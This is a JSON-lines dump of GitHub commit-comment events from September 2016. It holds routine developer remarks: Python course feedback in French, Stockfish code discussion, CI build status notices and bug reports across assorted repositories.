{"id":"4607515718","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19143554,"position":12,"line":11,"path":"correction-septembre-2016/dalliet-sylvain/interface.py","commit_id":"0ceb89253713d7c80a8611738ffd3da321535798","created_at":"2016-09-23T09:30:55Z","updated_at":"2016-09-23T09:30:55Z","body":"Une fois que le code est livré, il est préférable d'enlever les `reload()`"}},"created_at":"2016-09-23T09:30:55Z"}
{"id":"4607516132","type":"CommitCommentEvent","actor":{"login":"cebe"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19143555,"position":5,"line":75,"path":"framework/console/controllers/MigrateController.php","commit_id":"49aec24ae1f01d51b4f3cec8e44d44387022d06b","created_at":"2016-09-23T09:30:59Z","updated_at":"2016-09-23T09:30:59Z","body":"@larryli can you please adjust it and send a pull request?"}},"created_at":"2016-09-23T09:30:59Z"}
{"id":"4607516827","type":"CommitCommentEvent","actor":{"login":"Arron2"},"repo":{"name":"Arron2/manage"},"payload":{"comment":{"id":19143557,"position":null,"line":null,"path":null,"commit_id":"c38bac917b0e12c45cc13322fea2fa3444b94680","created_at":"2016-09-23T09:31:09Z","updated_at":"2016-09-23T09:31:09Z","body":"1、静态html布局\r\n 2、侧边栏可以收缩\r\n 3、全屏显示\r\n 4、兼容chrome、firefox、IE8以上版本"}},"created_at":"2016-09-23T09:31:09Z"}
{"id":"4607517454","type":"CommitCommentEvent","actor":{"login":"vjt"},"repo":{"name":"ifad/chronomodel"},"payload":{"comment":{"id":19143559,"position":null,"line":null,"path":null,"commit_id":"f2132e1ce5e2c6d3846ea5043f3bb1c54c105f01","created_at":"2016-09-23T09:31:18Z","updated_at":"2016-09-23T09:31:18Z","body":"Very good."}},"created_at":"2016-09-23T09:31:18Z"}
{"id":"4607518051","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19143561,"position":null,"line":null,"path":null,"commit_id":"753ece3fc103f6be5d119f436bf4394b4d56a32f","created_at":"2016-09-23T09:31:25Z","updated_at":"2016-09-23T09:31:25Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1138](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14075&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T09:31:25Z"}
{"id":"4607518066","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19143562,"position":null,"line":null,"path":null,"commit_id":"7b886628cf73a0af8f14e00b655988cffaeba0a8","created_at":"2016-09-23T09:31:26Z","updated_at":"2016-09-23T09:31:26Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1139](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14076&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T09:31:26Z"}
{"id":"4607520503","type":"CommitCommentEvent","actor":{"login":"mdouglas90"},"repo":{"name":"lis-epfl/MAVRIC_Library"},"payload":{"comment":{"id":19143571,"position":11,"line":267,"path":"communication/mavlink_waypoint_handler.hpp","commit_id":"65811c57db0de3fcd0cf074cdf93ab24c708ac53","created_at":"2016-09-23T09:31:55Z","updated_at":"2016-09-23T09:31:55Z","body":"There is a home waypoint and that function did not set it, which is why I renamed it. It's just responsible for setting the first waypoint in the list at construction so that there was a waypoint in the list from the start. It could be removed completely or have the logic moved to the init function."}},"created_at":"2016-09-23T09:31:55Z"}
{"id":"4607521010","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19143573,"position":null,"line":null,"path":null,"commit_id":"0eb8b92064db014100d6ed2b618c8cf635b37c26","created_at":"2016-09-23T09:32:03Z","updated_at":"2016-09-23T09:32:03Z","body":"@snicolet Got it, we just need to set\r\n`fromb = 0;`\r\nin min_attacker<KING>"}},"created_at":"2016-09-23T09:32:03Z"}
{"id":"4607526081","type":"CommitCommentEvent","actor":{"login":"WST"},"repo":{"name":"vthriller/stopwatch"},"payload":{"comment":{"id":19143578,"position":null,"line":null,"path":null,"commit_id":"ab03f3c705f3f1518b59d996efe66dd754bb81fe","created_at":"2016-09-23T09:33:05Z","updated_at":"2016-09-23T09:33:05Z","body":"cute :3"}},"created_at":"2016-09-23T09:33:05Z"}
{"id":"4607526141","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19143580,"position":null,"line":null,"path":null,"commit_id":"4d8e3d89f1c52b27dabd619a32f21e8b6e28e971","created_at":"2016-09-23T09:33:06Z","updated_at":"2016-09-23T09:33:06Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1137](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14072&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 221, ignored: 3 Build time: 00:08:43\n### Failed tests\n```\norg.genivi.sota.resolver.daemon.PackageCreatedListenerSpec.saves package to database: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-23T09:33:06Z"}
{"id":"4607528461","type":"CommitCommentEvent","actor":{"login":"viciious"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":19143584,"position":19,"line":175,"path":"lib/mapObjects/CRewardableObject.cpp","commit_id":"bb05db90e53183bd67524ca54d5c317e1f5aa4fb","created_at":"2016-09-23T09:33:36Z","updated_at":"2016-09-23T09:33:36Z","body":"Ye-ye, I know how it works :P"}},"created_at":"2016-09-23T09:33:36Z"}
{"id":"4607528902","type":"CommitCommentEvent","actor":{"login":"xiaofeixiawei"},"repo":{"name":"xiaofeixiawei/test"},"payload":{"comment":{"id":19143585,"position":3,"line":3,"path":"README.md","commit_id":"6908718519c2af38d273ef660836f2592e29b9a8","created_at":"2016-09-23T09:33:42Z","updated_at":"2016-09-23T09:33:42Z","body":"aaa"}},"created_at":"2016-09-23T09:33:42Z"}
{"id":"4607528979","type":"CommitCommentEvent","actor":{"login":"SingingBush"},"repo":{"name":"buggins/hibernated"},"payload":{"comment":{"id":19143586,"position":null,"line":null,"path":null,"commit_id":"8a0f710feac573b45e2a54035bc71eb32018cd15","created_at":"2016-09-23T09:33:43Z","updated_at":"2016-09-23T09:33:43Z","body":"updating ddbc caused all the builds to fail. see build logs:\r\n\r\n```\r\nddbc-0.3.2/ddbc/source/ddbc/pods.d(80,1) conflicts with hibernated.type.String at ../source/hibernated/type.d(43,1)\r\n```"}},"created_at":"2016-09-23T09:33:43Z"}
{"id":"4607529652","type":"CommitCommentEvent","actor":{"login":"lots0logs"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19143588,"position":14,"line":19,"path":"scripts/utils.sh","commit_id":"f8c7f0c8a7eb71ca00aea2aa08536eae1715d02d","created_at":"2016-09-23T09:33:52Z","updated_at":"2016-09-23T09:33:52Z","body":"Indeed. Thanks :+1: "}},"created_at":"2016-09-23T09:33:52Z"}
{"id":"4607530390","type":"CommitCommentEvent","actor":{"login":"lots0logs"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19143589,"position":35,"line":31,"path":"scripts/utils.sh","commit_id":"f8c7f0c8a7eb71ca00aea2aa08536eae1715d02d","created_at":"2016-09-23T09:34:01Z","updated_at":"2016-09-23T09:34:01Z","body":":+1: "}},"created_at":"2016-09-23T09:34:01Z"}
{"id":"4607538458","type":"CommitCommentEvent","actor":{"login":"TorsteinHonsi"},"repo":{"name":"highcharts/highcharts"},"payload":{"comment":{"id":19143605,"position":null,"line":null,"path":null,"commit_id":"643d9ef572d993ee626de7d28c27b7e03dfb8d07","created_at":"2016-09-23T09:35:39Z","updated_at":"2016-09-23T09:35:39Z","body":"Yes, it will be fixed in Highcharts 5, which will be out probably next week."}},"created_at":"2016-09-23T09:35:39Z"}
{"id":"4607544574","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19143617,"position":1,"line":1,"path":"correction-septembre-2016/dalliet-sylvain/interface.py","commit_id":"0ceb89253713d7c80a8611738ffd3da321535798","created_at":"2016-09-23T09:36:57Z","updated_at":"2016-09-23T09:36:57Z","body":"Les triples quotes permettent de faire des blocs de texte, tu aurais pu mettre\r\n```Python\r\n\"\"\"Module Python Sylvain Dalliet IIM\r\nTeapot Creation Interface\"\"\"\r\n```"}},"created_at":"2016-09-23T09:36:57Z"}
{"id":"4607547229","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19143620,"position":13,"line":8,"path":"correction-septembre-2016/dalliet-sylvain/interface.py","commit_id":"0ceb89253713d7c80a8611738ffd3da321535798","created_at":"2016-09-23T09:37:31Z","updated_at":"2016-09-23T09:37:31Z","body":"Il existe cette convention pour signaler qui est l'auteur d'un fichier Python"}},"created_at":"2016-09-23T09:37:31Z"}
{"id":"4607547740","type":"CommitCommentEvent","actor":{"login":"zeffii"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":19143622,"position":16,"line":427,"path":"utils/sv_IO_panel_tools.py","commit_id":"84db7392d70c885f8be48fb482b0380bec774be5","created_at":"2016-09-23T09:37:38Z","updated_at":"2016-09-23T09:37:38Z","body":"i've reopened the issue: https://github.com/nortikin/sverchok/issues/810"}},"created_at":"2016-09-23T09:37:38Z"}
{"id":"4607549900","type":"CommitCommentEvent","actor":{"login":"SilverFire"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19143626,"position":5,"line":75,"path":"framework/console/controllers/MigrateController.php","commit_id":"49aec24ae1f01d51b4f3cec8e44d44387022d06b","created_at":"2016-09-23T09:38:07Z","updated_at":"2016-09-23T09:38:07Z","body":"Already merged https://github.com/yiisoft/yii2/pull/12589"}},"created_at":"2016-09-23T09:38:07Z"}
{"id":"4607550241","type":"CommitCommentEvent","actor":{"login":"jkavalik"},"repo":{"name":"nette/tracy"},"payload":{"comment":{"id":19143627,"position":5,"line":394,"path":"src/Tracy/assets/Bar/bar.js","commit_id":"798fbdb5e5a5e4cd3f2844a635f66f76b2757a9b","created_at":"2016-09-23T09:38:12Z","updated_at":"2016-09-23T09:38:12Z","body":"@dg Hello,\r\n\r\nI believe this is not how it works, the existence of {{XDEBUG_PROFILE}} variable is enough to enable the profiler when in 'trigger' mode, setting the value to 0 does not disable it - https://xdebug.org/docs/all_settings#profiler_enable_trigger\r\n\r\nMy temp folder is filling with cachegrind files for each tracy bar rendered."}},"created_at":"2016-09-23T09:38:12Z"}
{"id":"4607550640","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19143628,"position":21,"line":26,"path":"correction-septembre-2016/dalliet-sylvain/interface.py","commit_id":"0ceb89253713d7c80a8611738ffd3da321535798","created_at":"2016-09-23T09:38:17Z","updated_at":"2016-09-23T09:38:17Z","body":"A l'intérieur d'une classe le PEP8 spécifie qu'il ne faut laisser qu'une seule ligne blanche entre chaque méthode (fonction)"}},"created_at":"2016-09-23T09:38:17Z"}
{"id":"4607552384","type":"CommitCommentEvent","actor":{"login":"lukaswelte"},"repo":{"name":"blackwall-eng/mobile"},"payload":{"comment":{"id":19143630,"position":null,"line":null,"path":null,"commit_id":"6d96e5753bc5b044f2927de605fecfd32ab7889e","created_at":"2016-09-23T09:38:40Z","updated_at":"2016-09-23T09:38:40Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [\"I DID IT\" Button at the end](https://trello.com/c/pvw2oUmH/97-i-did-it-button-at-the-end)"}},"created_at":"2016-09-23T09:38:40Z"}
{"id":"4607553657","type":"CommitCommentEvent","actor":{"login":"imago-storm"},"repo":{"name":"electric-cloud/EC-WebSphere"},"payload":{"comment":{"id":19143634,"position":82,"line":82,"path":"src/main/resources/project/server/mapSharedLibrary.pl","commit_id":"c52156136c75dbbab31581cd6025ae4e2bb89de0","created_at":"2016-09-23T09:38:56Z","updated_at":"2016-09-23T09:38:56Z","body":"Looks like forgotten copy&paste. Or property name should be changed to something more appropriate for shared libraries."}},"created_at":"2016-09-23T09:38:56Z"}
{"id":"4607553907","type":"CommitCommentEvent","actor":{"login":"xfunforx"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19143636,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-23T09:38:59Z","updated_at":"2016-09-23T09:38:59Z","body":"video https://youtu.be/JrnNnhD1gWg"}},"created_at":"2016-09-23T09:38:59Z"}
{"id":"4607558356","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"fedora-python/pyp2rpm"},"payload":{"comment":{"id":19143646,"position":5,"line":39,"path":"pyp2rpm/metadata_extractors.py","commit_id":"fcffbc75aaefd97e13fd50cdedafb37225496e90","created_at":"2016-09-23T09:39:54Z","updated_at":"2016-09-23T09:39:54Z","body":"This only happens when local file is used?"}},"created_at":"2016-09-23T09:39:54Z"}
{"id":"4607558570","type":"CommitCommentEvent","actor":{"login":"xfunforx"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19143649,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-23T09:39:57Z","updated_at":"2016-09-23T09:39:57Z","body":"please look at the video. "}},"created_at":"2016-09-23T09:39:57Z"}
{"id":"4607558650","type":"CommitCommentEvent","actor":{"login":"kayelst"},"repo":{"name":"AP-Elektronica-ICT/ipd_2016-ipd16_SmartOutlet"},"payload":{"comment":{"id":19143650,"position":null,"line":null,"path":null,"commit_id":"cfed5bdbc9a1822dfad69786795861f45e619b88","created_at":"2016-09-23T09:39:58Z","updated_at":"2016-09-23T09:39:58Z","body":"TestComment voor access?"}},"created_at":"2016-09-23T09:39:58Z"}
{"id":"4607561753","type":"CommitCommentEvent","actor":{"login":"c0r1an"},"repo":{"name":"IlchCMS/Ilch-2.0"},"payload":{"comment":{"id":19143657,"position":null,"line":null,"path":null,"commit_id":"49724994f9808939dcf5aeb0bf9541b5e03ee5d4","created_at":"2016-09-23T09:40:37Z","updated_at":"2016-09-23T09:40:37Z","body":"Das führt bei mir zu neuen Fehlern `Fatal error: Uncaught Error: Call to undefined method Modules\\Admin\\Controllers\\Admin\\Settings::getTransferUrl() in application\\modules\\admin\\controllers\\admin\\Settings.php:194` \r\n\r\nWurde das updaten für Module schon eingebaut?"}},"created_at":"2016-09-23T09:40:37Z"}
{"id":"4607561833","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19143658,"position":34,"line":76,"path":"correction-septembre-2016/dalliet-sylvain/interface.py","commit_id":"0ceb89253713d7c80a8611738ffd3da321535798","created_at":"2016-09-23T09:40:38Z","updated_at":"2016-09-23T09:40:38Z","body":"Pour éviter d’écrire des lignes trop longues, il est possible d'étaler un `str` sur plusieurs lignes. Par exemple\r\n```Python\r\nma_variable = \"un long texte que \" \\\r\n              \"j'ai envie d'ecrire sur \" \\\r\n              \"plusieurs lignes\""}},"created_at":"2016-09-23T09:40:38Z"}
{"id":"4607563234","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19143662,"position":null,"line":null,"path":null,"commit_id":"753ece3fc103f6be5d119f436bf4394b4d56a32f","created_at":"2016-09-23T09:40:57Z","updated_at":"2016-09-23T09:40:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1138](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14075&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 227, ignored: 3 Build time: 00:09:32\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-23T09:40:57Z"}
{"id":"4607563287","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"fedora-python/pyp2rpm"},"payload":{"comment":{"id":19143663,"position":11,"line":42,"path":"pyp2rpm/metadata_extractors.py","commit_id":"fcffbc75aaefd97e13fd50cdedafb37225496e90","created_at":"2016-09-23T09:40:58Z","updated_at":"2016-09-23T09:40:58Z","body":"But this can happen for multiple reasons?\r\n\r\n"}},"created_at":"2016-09-23T09:40:58Z"}
{"id":"4607568436","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":19143676,"position":5,"line":0,"path":"testing/php7-memcached/APKBUILD","commit_id":"b03aca9dda99bcc857da1e07e02db624f2957f93","created_at":"2016-09-23T09:42:04Z","updated_at":"2016-09-23T09:42:04Z","body":"This format is invalid. apk uses Gentoo versioning format described on https://devmanual.gentoo.org/ebuild-writing/file-format/"}},"created_at":"2016-09-23T09:42:04Z"}
{"id":"4607569260","type":"CommitCommentEvent","actor":{"login":"sirlatrom"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":19143680,"position":205,"line":277,"path":"components/camel-salesforce/camel-salesforce-component/src/main/java/org/apache/camel/component/salesforce/internal/streaming/SubscriptionHelper.java","commit_id":"7d97e5b5800969b74e805e66a94a6c5323bfeafc","created_at":"2016-09-23T09:42:15Z","updated_at":"2016-09-23T09:42:15Z","body":"@dhirajsb If the max backoff hasn't been reached yet, what will happen? As far as I can tell, the failure to restart is reported, and no further attempt is made. Shouldn't a new attempt be scheduled?"}},"created_at":"2016-09-23T09:42:15Z"}
{"id":"4607573959","type":"CommitCommentEvent","actor":{"login":"jlecoeur"},"repo":{"name":"lis-epfl/MAVRIC_Library"},"payload":{"comment":{"id":19143690,"position":11,"line":267,"path":"communication/mavlink_waypoint_handler.hpp","commit_id":"65811c57db0de3fcd0cf074cdf93ab24c708ac53","created_at":"2016-09-23T09:43:16Z","updated_at":"2016-09-23T09:43:16Z","body":"Ok, what is the point of having a waypoint in the list from the start?"}},"created_at":"2016-09-23T09:43:16Z"}
{"id":"4607574950","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19143693,"position":null,"line":null,"path":null,"commit_id":"7b886628cf73a0af8f14e00b655988cffaeba0a8","created_at":"2016-09-23T09:43:28Z","updated_at":"2016-09-23T09:43:28Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1139](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14076&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:12:02"}},"created_at":"2016-09-23T09:43:28Z"}
{"id":"4607576162","type":"CommitCommentEvent","actor":{"login":"SchroedingersCatIsUndead"},"repo":{"name":"eMoflon/emoflon-tool"},"payload":{"comment":{"id":19143699,"position":null,"line":null,"path":null,"commit_id":"89e5ca7ba1be289f41bb51e3380da74ad6060425","created_at":"2016-09-23T09:43:44Z","updated_at":"2016-09-23T09:43:44Z","body":"should be issue  #87"}},"created_at":"2016-09-23T09:43:44Z"}
{"id":"4607582956","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19143708,"position":null,"line":null,"path":null,"commit_id":"0eb8b92064db014100d6ed2b618c8cf635b37c26","created_at":"2016-09-23T09:45:10Z","updated_at":"2016-09-23T09:45:10Z","body":"Nope, setting a wrong value for fromb is not the right solution: if you introduce a new output parameter to a function, it MUST always return a correct value. That's a contract between the reader of the code and the writer of the function.\r\n\r\nWe have stmAttacker, so we can do fromb = stmAttacker in case of king, and it will be correct.\r\n\r\nI have written a version which is 0.8% faster than the one we are using in this commit\r\n(and verified that each transformation is a small speed improvement):\r\n\r\n• move fromb inside min_attacker for king\r\n• use nextVictim instead of type_of(piece_on(lsb(fromb)))\r\n• reduce branching by removing the useless guard against stmAttackers in line 1052\r\n\r\nSo I suggest using the following version for LTC, if any:\r\nhttps://github.com/snicolet/Stockfish/commit/591ebb22c0b54f92cf3798a32d53d657345d68e6\r\n"}},"created_at":"2016-09-23T09:45:10Z"}
{"id":"4607583288","type":"CommitCommentEvent","actor":{"login":"shirshendu"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19143710,"position":4,"line":4,"path":"spec/ruby/library/bigmath/log_spec.rb","commit_id":"84a5f780a07576509e73467321fe775fb9c0ee77","created_at":"2016-09-23T09:45:14Z","updated_at":"2016-09-23T09:45:14Z","body":"Thanks for merging.\r\nCould I please get some help in trying to understand this description? Inside the test case, we call `BigMath::log`, but this description talks about `BigDecimal#abs`. Is that intentional?"}},"created_at":"2016-09-23T09:45:14Z"}
{"id":"4607583291","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19143711,"position":5,"line":237,"path":"components/pedigree/ui/src/main/resources/PhenoTips/UIX_Field__pedigree.xml","commit_id":"3e2f53d47c58ea649620f0837cf0925e074a8bd8","created_at":"2016-09-23T09:45:14Z","updated_at":"2016-09-23T09:45:14Z","body":"There's an extra quote."}},"created_at":"2016-09-23T09:45:14Z"}
{"id":"4607591915","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19143729,"position":42,"line":83,"path":"correction-septembre-2016/dalliet-sylvain/interface.py","commit_id":"0ceb89253713d7c80a8611738ffd3da321535798","created_at":"2016-09-23T09:47:04Z","updated_at":"2016-09-23T09:47:04Z","body":"Il n'est pas nécessaire de caster `quantity_area.text()` en `int`, la valeur est accessible avec `quantity_area.value()`"}},"created_at":"2016-09-23T09:47:04Z"}
{"id":"4607595350","type":"CommitCommentEvent","actor":{"login":"mdouglas90"},"repo":{"name":"lis-epfl/MAVRIC_Library"},"payload":{"comment":{"id":19143734,"position":11,"line":267,"path":"communication/mavlink_waypoint_handler.hpp","commit_id":"65811c57db0de3fcd0cf074cdf93ab24c708ac53","created_at":"2016-09-23T09:47:48Z","updated_at":"2016-09-23T09:47:48Z","body":"I guess it has outlived its usefulness now that it goes to home with no waypoints set."}},"created_at":"2016-09-23T09:47:48Z"}
{"id":"4607595675","type":"CommitCommentEvent","actor":{"login":"kayelst"},"repo":{"name":"AP-Elektronica-ICT/ipd_2016-ipd16_SmartOutlet"},"payload":{"comment":{"id":19143735,"position":5,"line":660,"path":"README.md","commit_id":"cfed5bdbc9a1822dfad69786795861f45e619b88","created_at":"2016-09-23T09:47:51Z","updated_at":"2016-09-23T09:47:51Z","body":"Testcommit op bepaalde tekst"}},"created_at":"2016-09-23T09:47:51Z"}
{"id":"4607597480","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19143741,"position":null,"line":null,"path":null,"commit_id":"0eb8b92064db014100d6ed2b618c8cf635b37c26","created_at":"2016-09-23T09:48:16Z","updated_at":"2016-09-23T09:48:16Z","body":"@snicolet Thank you very much. Hopefully one of our (current) tries will make it! That would be another break through."}},"created_at":"2016-09-23T09:48:16Z"}
{"id":"4607597996","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19143744,"position":57,"line":91,"path":"correction-septembre-2016/dalliet-sylvain/interface.py","commit_id":"0ceb89253713d7c80a8611738ffd3da321535798","created_at":"2016-09-23T09:48:23Z","updated_at":"2016-09-23T09:48:23Z","body":"Les variables `quantity_teapot` et `custom_name` sont locales aux fonctions, il n'y a donc aucun problème à utiliser le même nom de variable dans les deux fonctions, elles n’interagissent pas"}},"created_at":"2016-09-23T09:48:23Z"}
{"id":"4607600470","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19143748,"position":null,"line":null,"path":null,"commit_id":"0eb8b92064db014100d6ed2b618c8cf635b37c26","created_at":"2016-09-23T09:48:52Z","updated_at":"2016-09-23T09:48:52Z","body":"yes, that would be nice :)"}},"created_at":"2016-09-23T09:48:52Z"}
{"id":"4607602405","type":"CommitCommentEvent","actor":{"login":"skykiahs"},"repo":{"name":"shadowsocks/shadowsocks"},"payload":{"comment":{"id":19143753,"position":null,"line":null,"path":null,"commit_id":"938bba32a4008bdde9c064dda6a0597987ddef54","created_at":"2016-09-23T09:49:16Z","updated_at":"2016-09-23T09:49:16Z","body":"Thank You"}},"created_at":"2016-09-23T09:49:16Z"}
{"id":"4607603072","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19143759,"position":null,"line":null,"path":null,"commit_id":"acb20235a0a2fe6c31945ab7aa896aeed0ab2873","created_at":"2016-09-23T09:49:27Z","updated_at":"2016-09-23T09:49:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1140](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14090&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T09:49:27Z"}
{"id":"4607606142","type":"CommitCommentEvent","actor":{"login":"masutaka"},"repo":{"name":"feedforce/tech.feedforce.jp"},"payload":{"comment":{"id":19143767,"position":null,"line":null,"path":null,"commit_id":"df09a6bd67349761b5ce15e1f02c7c5733f77cec","created_at":"2016-09-23T09:50:04Z","updated_at":"2016-09-23T09:50:04Z","body":".textlintrc を以下に変更しても Disable に出来ましたが、範囲が全記事になるので、今回は上の方法を採用しました。\r\n\r\n```\r\n{\r\n  \"rules\": {\r\n    \"preset-japanese\": {\r\n      \"sentence-length\": false\r\n    }\r\n  }\r\n}\r\n```\r\n\r\nhttps://github.com/textlint/textlint/blob/master/docs/configuring.md#rules-config"}},"created_at":"2016-09-23T09:50:04Z"}
{"id":"4607608230","type":"CommitCommentEvent","actor":{"login":"mdouglas90"},"repo":{"name":"lis-epfl/MAVRIC_Library"},"payload":{"comment":{"id":19143774,"position":11,"line":267,"path":"communication/mavlink_waypoint_handler.hpp","commit_id":"65811c57db0de3fcd0cf074cdf93ab24c708ac53","created_at":"2016-09-23T09:50:30Z","updated_at":"2016-09-23T09:50:30Z","body":"Removed in 8c09ccf."}},"created_at":"2016-09-23T09:50:30Z"}
{"id":"4607609064","type":"CommitCommentEvent","actor":{"login":"xuzaixian"},"repo":{"name":"TeamOfUs/guess-and-draw"},"payload":{"comment":{"id":19143776,"position":5,"line":3,"path":"bin/websocket-server.js","commit_id":"6ea31d6f0c3e6e4d32afc6e5e4154bef5b6e0a46","created_at":"2016-09-23T09:50:40Z","updated_at":"2016-09-23T09:50:40Z","body":"这是我特啊，这你都不认识。"}},"created_at":"2016-09-23T09:50:40Z"}
{"id":"4607609943","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19143779,"position":18,"line":25,"path":"correction-septembre-2016/dalliet-sylvain/teapot_create.py","commit_id":"0ceb89253713d7c80a8611738ffd3da321535798","created_at":"2016-09-23T09:50:49Z","updated_at":"2016-09-23T09:50:49Z","body":"La logique dans le bloc qui suit est étrange. Il n'y avait pas besoin de faire la première teapot hors de la boucle `for`.\r\nEn utilisant `range()` sans spécifier de valeur initiale, Python compte de zéro à la valeur donnée, exclue\r\n```Python\r\nrange(5) = [0, 1, 2, 3, 4]\r\n```"}},"created_at":"2016-09-23T09:50:49Z"}
{"id":"4607614374","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19143790,"position":60,"line":48,"path":"correction-septembre-2016/dalliet-sylvain/teapot_create.py","commit_id":"0ceb89253713d7c80a8611738ffd3da321535798","created_at":"2016-09-23T09:51:43Z","updated_at":"2016-09-23T09:51:43Z","body":"Attention de bien respecter la convention PEP8 pour les noms de variable : en minuscule, et les mots séparés par des underscores"}},"created_at":"2016-09-23T09:51:43Z"}
{"id":"4607617402","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19143803,"position":85,"line":63,"path":"correction-septembre-2016/dalliet-sylvain/teapot_create.py","commit_id":"0ceb89253713d7c80a8611738ffd3da321535798","created_at":"2016-09-23T09:52:22Z","updated_at":"2016-09-23T09:52:22Z","body":"La distance est accessible par multiplication de l'index par le pas, pas besoin d'incrémenter la variable à chaque itération"}},"created_at":"2016-09-23T09:52:22Z"}
{"id":"4607620189","type":"CommitCommentEvent","actor":{"login":"MrSwed"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":19143808,"position":null,"line":null,"path":null,"commit_id":"5278ee3b890595343e8ef8a8235bee9e6c3096bb","created_at":"2016-09-23T09:52:59Z","updated_at":"2016-09-23T09:52:59Z","body":"filters disabled if phx enabled, so this no sense"}},"created_at":"2016-09-23T09:52:59Z"}
